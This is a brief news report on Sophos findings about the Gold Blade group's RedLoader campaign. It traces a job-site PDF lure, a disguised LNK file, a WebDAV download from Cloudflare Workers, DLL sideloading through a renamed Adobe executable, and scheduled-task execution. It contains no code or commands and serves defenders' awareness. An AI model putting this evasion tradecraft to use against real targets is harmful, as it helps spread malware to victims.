Cybersecurity researchers at Sophos have uncovered a new infection chain linked to the Gold Blade cybercriminal group used for the delivery of the custom RedLoader malware. The latest campaign leverages a previously unreported method of initial access, combining multiple tactics that Gold Blade has used separately until now.
The attack chain begins with a seemingly legitimate cover letter PDF sent to a target via a third-party job site. Hidden within the PDF is a malicious link that downloads a ZIP archive to the victim's system. Inside the archive is a LNK file, disguised as a PDF, that launches the infection process.
Upon execution, the LNK file triggers conhost.exe, which in turn uses WebDAV to connect to an attacker-controlled CloudFlare Workers domain initiating the download of a signed and renamed Adobe ADNotificationManager.exe file masqueraded as a resume. Another file is a malicious DLL named netutils.dll, wich is the RedLoader stage 1 payload.
By sideloading the malicious DLL via the renamed Adobe executable, the attackers effectively begin the RedLoader infection chain. Once active, the stage 1 payload creates a scheduled task titled used to execute a second-stage payload, retrieved from another CloudFlare Workers domain.
RedLoader stage 2 arrives as a standalone executable. The scheduled task leverages both PCALua.exe and conhost.exe to execute the second-stage malware, which then establishes communication with a command-and-control (C2) server.
“The July activity shows how threat actors can combine prior techniques to modify their attack chain and bypass defenses. Gold Blade continues to rely heavily on LNK files that impersonate other file types,” Sophos has warned.